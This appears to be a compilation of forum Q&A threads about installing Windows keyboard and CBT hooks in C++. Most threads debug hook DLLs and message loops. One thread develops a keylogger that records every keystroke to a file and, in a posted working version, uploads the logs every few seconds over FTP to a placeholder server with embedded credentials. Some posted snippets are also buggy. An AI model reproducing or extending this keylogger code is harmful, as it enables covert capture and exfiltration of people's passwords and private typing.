I am trying to create a system wide hook to monitor processes and terminate unwanted ones. I searched and found out I need to use CBT hooks, my first try failed and this is the second one, the former question can be found here though.
The following code builds just fine, but it seems the hooks are not even called, since I tried setting break point in the DllMain(), but I never reach there. Other functions seem to be accessible though!
Here are the code snippets:
dllmain.cpp
// dllmain.cpp : Defines the entry point for the DLL application.
#pragma once
#include "stdafx.h"
#include <iostream>
#include <fstream>
#include <Windows.h>
using namespace std;
HINSTANCE currentProcessHandle;
HOOKPROC hkprcSysMsg;
HHOOK hookID;
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
std::ofstream outfile("test.txt");
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
currentProcessHandle = hModule;
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
LRESULT CALLBACK HookProcedure(int nCode, WPARAM wparam, LPARAM lparam)
{
std::ofstream outfile("test.txt");
if (nCode >= 0)
{
switch (nCode)
{
case HCBT_CREATEWND:
outfile << L"Created!~";
cout << "Created!~" << endl;
break;
case HCBT_DESTROYWND:
outfile << L"Destroied!~";
cout << "Destroied!~" << endl;
break;
default:
cout << "sth else" << endl;
break;
}
}
else
{
return CallNextHookEx(hookID, nCode, wparam, lparam);
}
outfile.close();
}
__declspec(dllexport) void InstallHook()
{
hookID = SetWindowsHookEx(WH_CBT, HookProcedure, currentProcessHandle, 0);
}
__declspec(dllexport) void UnistallHook()
{
UnhookWindowsHookEx(hookID);
}
And this is the Consumer application
// Hook Executer.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "..\Dll\dllmain.cpp"
#include <iostream>
using namespace std;
int _tmain(int argc, _TCHAR* argv[])
{
int num = -1;
cout << "1.Install Hook"<<endl
<< "2.Unistall Hook"<<endl
<< "0.Exit";
do{
cin >> num;
if (num ==1)
{
InstallHook();
}
else
{
UnistallHook();
}
getchar();
system("cls");
cout << "1.Install Hook" << endl
<< "2.Unistall Hook" << endl
<< "0.Exit";
} while (num != 0 && num < 3);
return 0;
}
When I run the program there is no error, not even exceptions of any kind, it's as if there is no DLL or I have coded nothing inside that DLL. What's wrong with it?
implement your DLL code in a CPP file, not an header:
//dllmain.cpp
#include "stdafx.h" // include <Windows.h>
// and other std headers in stdafx.h, if not already done
HINSTANCE currentProcessHandle;
HHOOK hookID;
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call,
LPVOID lpReserved ) {
if ( ul_reason_for_call == DLL_PROCESS_ATTACH )
currentProcessHandle = hModule;
return TRUE;
}
LRESULT CALLBACK HookProcedure( int nCode, WPARAM wparam, LPARAM lparam ) {
if ( nCode < 0 ) return CallNextHookEx( NULL, nCode, wparam, lparam );
std::ofstream outfile;
outfile.open( "test.txt", // replace with an absolute path
std::fstream::app ); // append mode
if (nCode >= 0) {
switch( nCode ) {
case HCBT_CREATEWND:
outfile << "Created!\n";
break;
case HCBT_DESTROYWND:
outfile << "Destroyed!\n";
break;
default:
break;
}
}
outfile.close();
return 0;
}
void InstallHook( void ) {
hookID = SetWindowsHookEx( WH_CBT, HookProcedure, currentProcessHandle, 0 );
}
void UninstallHook( void ) { // NEW NAME
UnhookWindowsHookEx( hookID );
}
Declare the DLL APIs in a header file.
// dllapi.h
void InstallHook( void );
void UninstallHook( void ); // NEW NAME
Use a DEF file for exporting, add it to the DLL project
; Def file
EXPORTS
InstallHook
UninstallHook
In the EXE project, include ONLY the DLL header file
#include "..\Dll\dllapi.h"
In the EXE project, go to properties->Linker->Input->Additional dependencies and add the lib file generated during the build of the DLL. Alternative: make the DLL a dependency of the EXE in the project dependencies of the Solution, and in the EXE properties, set Yes for Linker->general->Use Library dependency Inputs
Related
I tried to implement a basic hook under windows.
While it technically works (my handle gets called) it produces massive bugs, that i do not know how to fix.
When I run the programm and try to write something in the firefox.exe searchbar or the explorer.exe addres bar the programs crash.
That is the code i currently tried. I stripped everything unnecessary but it still doesnt work
main.cc
#include <iostream>
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <shellapi.h>
int main (int argc, char** argv){
HINSTANCE dll = NULL;
HOOKPROC proc = NULL;
HHOOK hook = NULL;
MSG msg;
BOOL b_ret = FALSE;
dll = LoadLibraryA("hookdll.dll");
if (dll == NULL) {
std::cerr << "WinAPI Error: " << GetLastError() << "\n";
return 1;
}
proc = (HOOKPROC)GetProcAddress(dll, "KeyboardHook");
if (proc == NULL) {
FreeLibrary(dll);
std::cerr << "WinAPI Error: " << GetLastError() << "\n";
return 1;
}
hook = SetWindowsHookEx(WH_CALLWNDPROC, proc, dll, 0);
if (hook == NULL) {
FreeLibrary(dll);
std::cerr << "WinAPI Error: " << GetLastError() << "\n";
return 1;
}
while (GetMessage(&msg, NULL, WH_KEYBOARD, WM_KEYLAST) > 0) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
UnhookWindowsHookEx(hook);
FreeLibrary(dll);
return 0;
}
And in the DLL:
hooks.h
#ifndef __LOG_DLL_HOOKS_H__
#define __LOG_DLL_HOOKS_H__
#include <iostream>
#include <fstream>
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
extern "C" LRESULT CALLBACK KeyboardHook(
_In_ int code,
_In_ WPARAM wParam,
_In_ LPARAM lParam);
#endif // !__LOG_DLL_HOOKS_H__
hooks.cc
#include "Hooks.h"
extern "C" LRESULT CALLBACK KeyboardHook(
_In_ int code,
_In_ WPARAM wParam,
_In_ LPARAM lParam) {
if (code == HC_ACTION) {
}
return CallNextHookEx(NULL, code, wParam, lParam);
}
As you can see it barely does anything.
I worked with the official windows docs and did everything the right way (or so i thought)
The only thing that could make a difference is the return value of KeyboardHook, but
https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644984(v=vs.85) states that:
If code is less than zero, the hook procedure must return the value returned by CallNextHookEx.
If code is greater than or equal to zero, and the hook procedure did not process the message, it is highly recommended that you call CallNextHookEx and return the value it returns;
I read that as: "Return CallNextHookEx either way", which i did.
Thanks for any answeres
Well, for starters, why are you using a keyboard function for a window procedure hook? I think you meant to use WH_KEYBOARD instead of WH_CALLWNDPROC when calling SetWindowsHookEx().
Also, your GetMessage() call is wrong, because WH_KEYBOARD is not a message identifier. You would need to use WM_KEYFIRST instead, to match your use of WM_KEYLAST (since you are clearly only interested in dispatching keyboard messages).
However, you are setting the dwThreadId parameter of SetWindowsHookEx() to 0, which means you are hooking not just your own thread but all threads of all processes globally. A WH_KEYBOARD hook runs in the context of the thread that installs it, which means internally the OS will have to delegate the hooked keyboard messages of those other threads to your thread, and it does that by sending messages to your thread. But, your message loop is not going to be processing any of those messages because it is filtering for only keyboard messages (of which it will never receive, since your thread has no UI of its own).
With all of that said, try this instead:
#include <iostream>
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <shellapi.h>
int main (){
HINSTANCE dll = LoadLibraryA("hookdll.dll");
if (dll == NULL) {
std::cerr << "WinAPI Error: " << GetLastError() << "\n";
return 1;
}
HOOKPROC proc = (HOOKPROC) GetProcAddress(dll, "KeyboardHook");
if (proc == NULL) {
std::cerr << "WinAPI Error: " << GetLastError() << "\n";
FreeLibrary(dll);
return 1;
}
HHOOK hook = SetWindowsHookEx(WH_KEYBOARD, proc, dll, 0);
if (hook == NULL) {
std::cerr << "WinAPI Error: " << GetLastError() << "\n";
FreeLibrary(dll);
return 1;
}
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) > 0) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
UnhookWindowsHookEx(hook);
FreeLibrary(dll);
return 0;
}
I'm using SetWindowsHookExA(WH_KEYBOARD_LL, HookCallback, GetModuleHandleA(NULL), 0); to set a global hook for capturing the keystrokes, but the result is strange.
The callback function can be executed when I press the "special" keys such as "Enter", "Tab", "Shift", "Ctrl" and other keys having a Virtual Key Code, while it fails to capture the keystrokes when I press the regular letters and digits.
I am confused about it and could anyone tell me the reason?
#include <Windows.h>
#include <iostream>
using namespace std;
HHOOK keyboardHook = 0;
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *ks = (KBDLLHOOKSTRUCT*)lParam;
cout<< "[TEST] " << ks->vkCode << endl;
return CallNextHookEx(0, code, wParam, lParam);
}
int main()
{
keyboardHook = SetWindowsHookExA(WH_KEYBOARD_LL, HookCallback, GetModuleHandleA(NULL), 0);
if (keyboardHook == 0)
{
cout << "failed" << endl;
return -1;
}
cout << "ok" << endl;
MSG msg;
while(GetMessage(&msg, NULL, 0, 0)){
TranslateMessage(&msg);
DispatchMessage(&msg);
}
UnhookWindowsHookEx(keyboardHook);
return 0;
}
What can I do to make a timer in this keylogger so it sends logs every hour? I tried Sleep() function while loops, but they don't seem to work. I thought of using multi-threading, but I thought there must be a more efficient method.
#define _WIN32_WINNT 0x0500
#include<fstream>
#include<windows.h>
#include<iostream>
//globals
using namespace std;
ofstream out("keys.txt", ios::out);
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);
// If key is being pressed
if (wParam == WM_KEYDOWN) {
switch (p->vkCode) {
// Invisible keys
case VK_LCONTROL: out << "<LCTRL>"; break;
case VK_RCONTROL: out << "<RCTRL>"; break;
case VK_INSERT: out << "<INSERT>"; break;
case VK_END: out << "<END>"; break;
case VK_PRINT: out << "<PRINT>"; break;
case VK_DELETE: out << "<DEL>"; break;
case VK_BACK: out << "<BK>"; break;
case VK_LEFT: out << "<LEFT>"; break;
case VK_RIGHT: out << "<RIGHT>"; break;
case VK_UP: out << "<UP>"; break;
case VK_DOWN: out << "<dDOWN>"; break;
case VK_RETURN: out << "<ENTER>\n"; break;
//add special keys like semicolons
// Visible keys
default:
if (GetKeyState(VK_CAPITAL) && GetAsyncKeyState(VK_SHIFT)) //this should be on top to detect simultanous input first
out << char(tolower(p->vkCode));
else if (GetKeyState(VK_CAPITAL)||GetAsyncKeyState(VK_SHIFT))
out << char(toupper(p->vkCode));
//add capital version of sepecial keys
else
out << char(tolower(p->vkCode));
}
out.flush(); //to immediately flush to txt file
cout<<p<<endl;
}
return CallNextHookEx(NULL, nCode, wParam, lParam);
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
// Set windows hook
HHOOK keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,keyboardHookProc,hInstance,0);
MessageBox(NULL, "Press OK to stop logging.", "Information", MB_OK);
out.close();
return 0;
}
I'm using DEVC++
If you just want to send your logs every once in a while, you can easily do a check to detect how long it has been since the last log update!
Easy Method
You'll need to store all your keylogs between file updates. You can easily put them into a vector.
So Instead of outputting to your file with out << blahblah add the character to your vector with vectorname.push_back(blahblah)
You'll also need a timing variable. You can use the windows.h function GetTickCount for all of your timing needs.
When your keyboard hook/callback (the method you have your actual keylogging code in) gets called, check to see if it's been an hour since the last time you updated your log file, if it has been an hour or longer, update it and set your timing variable = GetTickCount.
Hope that helps!
The Win32 API function SetTimer executes a function every x milliseconds or any given time.
http://msdn.microsoft.com/en-us/library/windows/desktop/ms644906(v=vs.85).aspx
The following console program works like this: It sets a timer using SetTimer
then loops in a message loop. The message loop receives and processes WM_TIMER messages
and the timer callback also is called for each time interval.
usage_Time_millisec=1000;//1 sec=1000ms 1 min=60*1000ms
Simply put the stuff you want done in the CALLBACK TimerProc() function.
#define STRICT 1
#include <windows.h>
#include <iostream.h>
#include <time.h>
unsigned long minutes=0;
int Counter=0;
int usage_Time_millisec=1000;//1 sec=1000ms 1 min=60*1000ms
clock_t timer_start, timer_stop;
MSG Msg;
UINT TimerId;
VOID CALLBACK TimerProc(HWND hWnd, UINT nMsg, UINT nIDEvent, DWORD dwTime)
{
//put the stuff you want done in here
cout << "Doing stuff Time: " << dwTime << '\n';
cout << abs(timer_start - timer_stop ) <<" millisecond delay " << endl;
cout << "--------------------------------------------------\n" ;
cout.flush();
}
int main(int argc, char *argv[], char *envp[])
{
usage_Time_millisec=1000;//1 sec=1000ms 1 min=60*1000ms
TimerId = SetTimer(NULL, 0, usage_Time_millisec, &TimerProc); //bind TimerProc() to SetTimer()
timer_start = clock ();
timer_stop = clock ();
cout << "TimerId: " << TimerId << '\n';
if (!TimerId) return 16;
while (GetMessage(&Msg, NULL, 0, 0))
{
++Counter;
if (Msg.message == WM_TIMER)
{
timer_start = clock ();
//cout << "Doing stuff Counter: " << Counter << "; timer message\n";
}
else
{
timer_stop = clock ();
timer_start = clock ();
//cout << "Doing stuff Counter: " << Counter << "; message: " << Msg.message << '\n';
}
DispatchMessage(&Msg);
}
KillTimer(NULL, TimerId);
return 0;
}
I used SetTimer() and it works like a charm.
#define _WIN32_WINNT 0x0500
#include<fstream>
#include<windows.h>
#include<iostream>
#include <time.h>
#include <wininet.h>
using namespace std;
//globals
char date[100]; //must be a global variable
char *datetxt; //must be a global variable
char *buffer; //for outputting to new file, if there isnt internet
void namer(); //show nointernet() that namer() exists
void nointernet()
{
std::ifstream inFile(datetxt);//copy to buffer
inFile >> buffer;
inFile.close();
remove(datetxt); //delete old name
namer(); //give new name
std::ofstream outFile(datetxt); //should be here to avoid new and old name mishaps
outFile << buffer; //enter copied data here
}
void namer()
{
time_t rawtime;
struct tm *timeinfo;
time (&rawtime);
timeinfo = localtime (&rawtime);
strftime(date, 100, "%H%M%d%m%Y%S", timeinfo); //get date
datetxt = strcat(date, ".txt"); //joins date with a .txt extrention
}
int upload()
{
HINTERNET hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); // Initialization for WinInet Functions
if (!hInternet)
{
nointernet(); //if there is no internet, append new log file
}
HINTERNET hFtpSession = InternetConnect(hInternet, "ftp.SERVER.com", INTERNET_DEFAULT_FTP_PORT, "USER", "PASS", INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0); // Starts a session in this case an FTP session
if (!hFtpSession)
{
InternetCloseHandle(hInternet);
nointernet(); //if you cant access ftp, append to new log file
}
FtpPutFile(hFtpSession, datetxt, datetxt, FTP_TRANSFER_TYPE_BINARY, 0); // Uploads datetxt file onto the FTP server as datetxt
InternetCloseHandle(hFtpSession); // Close hFtpSession
InternetCloseHandle(hInternet); // Close hInternet
//delete old datetxt
namer(); //give new name
return 0;
}
void CALLBACK repeat(HWND hwnd, UINT uMsg, UINT timerId, DWORD dwTime)
{
upload(); //upload old name and change name
}
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam)
{
PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);
ofstream out(datetxt, ios::app);
// If key is being pressed
if (wParam == WM_KEYDOWN)
{
switch (p->vkCode)
{
// Invisible keys
case VK_LCONTROL: out << "<LCTRL>"; break;
case VK_RCONTROL: out << "<RCTRL>"; break;
case VK_INSERT: out << "<INSERT>"; break;
case VK_END: out << "<END>"; break;
case VK_PRINT: out << "<PRINT>"; break;
case VK_DELETE: out << "<DEL>"; break;
case VK_BACK: out << "<BK>"; break;
case VK_LEFT: out << "<LEFT>"; break;
case VK_RIGHT: out << "<RIGHT>"; break;
case VK_UP: out << "<UP>"; break;
case VK_DOWN: out << "<dDOWN>"; break;
case VK_RETURN: out << "<ENTER>\n"; break;
//add special keys like semicolons
// Visible keys
default:
if (GetKeyState(VK_CAPITAL) && GetAsyncKeyState(VK_SHIFT)) //this should be on top to detect simultanous input first
out << char(tolower(p->vkCode));
else if (GetKeyState(VK_CAPITAL) || GetAsyncKeyState(VK_SHIFT))
out << char(toupper(p->vkCode));
//add capital version of special keys
else
out << char(tolower(p->vkCode));
}
out.close(); //to immediately flush to txt file
cout << p << endl;
}
return CallNextHookEx(NULL, nCode, wParam, lParam);
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
namer(); // for the datetxt name
HHOOK keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, 0); // Set windows hook
//re-run program here/*************************************************
MSG msg;
SetTimer(NULL, 0, 10000, (TIMERPROC) &repeat);
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
//till here/**********************************************************/
// out.close();
BOOL WINAPI UnhookWindowsHookEx(HHOOK keyboardHook);
return 0;
}
I am trying to create a dll where I can use to monitor all of system events (process creation, destruction, etc). This is what I have come up so far:
DLL main - the entry point of my DLL:
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
#include "CBTHook.h"
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CBT::CBTHook::SetHandle(hModule);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
DLL Header file
//Dll header file - function signatures
#ifdef CBTHOOKDLL_EXPORTS
#define CBTHOOKDLL_API __declspec(dllexport)
#else
#define CBTHOOKDLL_API __declspec(dllimport)
#endif
namespace CBT
{
class CBTHook
{
public:
CBTHook();
static void SetHandle(HINSTANCE handle);
void InstallHook();
void UnistallHook();
LRESULT CALLBACK HookProcedure(int nCode, WPARAM wparam, LPARAM lparam);
~CBTHook();
private:
static HINSTANCE currentProcessHandle;
HOOKPROC hkprcSysMsg;
static HHOOK hookID;
};
}
CBTHook.cpp
// CBTHook.cpp : Defines the exported functions for the DLL application.
//
#pragma once
#include "stdafx.h"
#include "CBTHook.h"
#include <Windows.h>
#include <iostream>
using namespace std;
namespace CBT
{
CBTHook::CBTHook()
{
}
void CBTHook::SetHandle(HINSTANCE handle)
{
currentProcessHandle = handle;
}
void CBTHook::InstallHook()
{
hookID = SetWindowsHookEx(WH_CBT,HookProcedure, currentProcessHandle, 0);
}
void CBTHook::UnistallHook()
{
UnhookWindowsHookEx(hookID);
}
LRESULT CALLBACK CBTHook::HookProcedure(int nCode, WPARAM wparam, LPARAM lparam)
{
if (nCode >= 0)
{
switch (nCode)
{
case HCBT_CREATEWND:
cout << "Created!~" << endl;
break;
case HCBT_DESTROYWND:
cout << "Destroied!~" << endl;
break;
default:
cout << "sth else" << endl;
break;
}
}
else
return CallNextHookEx(hookID, nCode, wparam, lparam);
}
}
Now the problem is that, SetWindowsHookEx wont accept the HookProcedure while as far as I have read and seen on the net the return value of the function in question is correct. I get the error:
error C3867: 'CBT::CBTHook::HookProcedure': function call missing argument list; use '&CBT::CBTHook::HookProcedure' to create a pointer to member
Doing as suggested by above doesn't solve the problem either!
What am I missing here?
Your hook procedure must be a free function or a static class method. If you want to call a class instance method, you need to wrap that call in one of the above.
Edit:
To set a hook you need no classes. This is a basic example. Every other problem stems from your use of a class. If you want to use a class, make sure you know how to do it. If you are unsure, C++ is not Java. You don't need to use a class if it works just perfectly without.
Example:
#include "stdafx.h"
HHOOK hHook;
BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
hHook = SetWindowsHookEx(WH_CBT, HookProcedure, hModule, 0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
LRESULT CALLBACK HookProcedure(int nCode, WPARAM wparam, LPARAM lparam)
{
if (nCode >= 0)
{
switch (nCode)
{
case HCBT_CREATEWND:
cout << "Created!~" << endl;
break;
case HCBT_DESTROYWND:
cout << "Destroied!~" << endl;
break;
default:
cout << "sth else" << endl;
break;
}
}
else
return CallNextHookEx(hHook, nCode, wparam, lparam);
}
I'll preface this with saying that I am new to win32 programming.
I'm creating a global keyboard hook using a .dll, I have put in install and uninstall functions to handle the actual setting and removing of the keyboard hook.
#pragma comment(linker, "/SECTION:.SHARED,RWS")
#pragma data_seg(".SHARED")
static HHOOK hk=NULL;
//static CMyFile *pLF;
#pragma data_seg()
HINSTANCE hins = NULL;
__declspec( dllexport ) LRESULT Install(){
std::cout << "Installing" << std::endl;
hk = SetWindowsHookEx(WH_KEYBOARD_LL,EventAnalysis::KeystrokeAnalysis::KeyboardCallback,hins,0);
if(hk == NULL){
std::cout << "Hook creation failed! - " << GetLastError() << std::endl;
}
return 0;
}
__declspec(dllexport) BOOL CALLBACK UnInstall()
{
std::cout << "UnInstalling" << std::endl;
return UnhookWindowsHookEx(hk);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
hins = (HINSTANCE) hModule;
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
So now that I have my .dll, I created a simple executable that loads the library and installs the hooks:
int _tmain(int argc, _TCHAR* argv[])
{
auto funHandle = LoadLibrary(L"C:\\Users\\tprodanov\\Documents\\visual studio 2010\\Projects\\HaveFun\\Release\\HaveFun.dll");
if(funHandle == NULL){
std::cout << "Library load failed! - " << GetLastError() << std::endl;
}
auto Install = (LRESULT(*)()) GetProcAddress(funHandle, "?Install##YAJXZ");
if(Install == NULL){
std::cout << "Procedure load failed! - " << GetLastError() << std::endl;
}
Install();
MSG Msg;
while(GetMessage(&Msg, NULL, 0, 0) > 0)
{
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
auto Uninstall = (BOOL(*)()) GetProcAddress(funHandle, "?UnInstall##YGHXZ");
if(Uninstall == NULL){
std::cout << "Procedure load failed! - " << GetLastError() << std::endl;
}
Uninstall();
return 0;
}
What I find curious is that the behavior of my program is as expected in its current state (and also if instead of a message loop I just pop out a MessageBox() that waits for the user to click OK), but it doesn't work if I use std::cin.get() or an empty while loop. Can someone please explain why this is the behavior?
Also as a followup question - the KeyboardCallback function just prints to the console "Key Pressed".
LRESULT CALLBACK EventAnalysis::KeystrokeAnalysis::KeyboardCallback(int nCode, WPARAM wParam, LPARAM lParam){
std::cout << "Key pressed" << std::endl;
return CallNextHookEx(NULL,nCode,wParam,lParam);
}
I expected that this will be printed only when I press keys when focused on the console window, but even if I type in notepad the "Key Pressed" messages show up in my executable that called the Install function of the .dll. I don't understand this, since as far as I understood the dynamic library is loaded independently in every process, so every process has its own copy of the KeyboardCallback function and it will try to print to the foreground window's console.
The documentation makes it clear what is happening:
This hook is called in the context of the thread that installed it. The call is made by sending a message to the thread that installed the hook. Therefore, the thread that installed the hook must have a message loop.
The hook is installed by the call you made to Install. And so in the same thread that makes that call you need to run a message loop.
As for why showing a message box influences things, a message box operates by running a modal message loop. And that message loop will dispatch the hook messages.
And for the followup question, again the documentation has the answer:
The system calls this function every time a new keyboard input event is about to be posted into a thread input queue.
When it says posted into a thread input queue it means any thread input queue.
Or in the remarks to the documentation of SetWindowsHookEx look at the list of the various hook types, and their scope. The WH_KEYBOARD_LL is listed as a global hook.
Note also that WH_KEYBOARD_LL is a low-level hook and so does not result in the DLL being injected into another process. In fact your code is overly complex. You simply do not need a DLL here at all. You can get it all going with a call to SetWindowsHookEx from your executable that passes a callback function in that same executable.
Here's a minimal sample program that demonstrates all this:
#include <Windows.h>
#include <iostream>
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
std::cout << "Key pressed" << std::endl;
return CallNextHookEx(NULL, nCode, wParam, lParam);
}
int main(int argc, char* argv[])
{
std::cout << "Installing" << std::endl;
HHOOK hk;
hk = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, 0);
MSG Msg;
while (GetMessage(&Msg, NULL, 0, 0))
{
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
std::cout << "UnInstalling" << std::endl;
UnhookWindowsHookEx(hk);
return 0;
}